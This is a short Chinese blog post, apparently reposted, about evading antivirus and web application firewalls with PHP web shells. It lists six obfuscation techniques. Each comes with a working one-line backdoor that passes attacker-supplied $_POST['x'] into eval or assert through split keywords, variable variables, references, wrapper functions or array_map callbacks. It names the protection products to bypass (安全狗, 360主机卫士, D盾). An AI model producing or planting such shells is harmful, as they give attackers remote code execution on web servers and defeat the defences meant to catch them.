个人认为免杀大致分为这几个方面:
1.关键字拆分。
比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样。
2.可变变量、引用、可变函数。
可变变量 比如$a=$_POST['x'];$b='a';@eval($$b);
引用 比如$a=$_POST['x'];$b=&$a;@eval($b);
可变函数 比如$a='a'.'ss'.'e'.'r'.'t';$a($_POST['x']);
3.添加其他代码。
添加其他代码 比如 if(empty($a))
{
$a=$_POST['x'];
}
@eval($a);
4.函数替换。
使用其他函数,比如eval可以使用assert替换。
5.封装到新的函数中。
新定义一个函数,使其封装到新函数中。
function test($a){ //定义一个名为test的函数,并使用$a接受参数
eval($a);
}
test($_POST['x']);
6.函数回调。
使用其他函数进行调用,并执行。
如:array_map('a'.'s'.'se'.'r'.'t',array($_POST['x']));
详细教程 + 测试结果(安全狗+360主机卫士+D盾) 请看视频教程。
视频教程下载地址:点击原文地址获取
转载于:https://my.oschina.net/ichunqiu/blog/730554
459
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
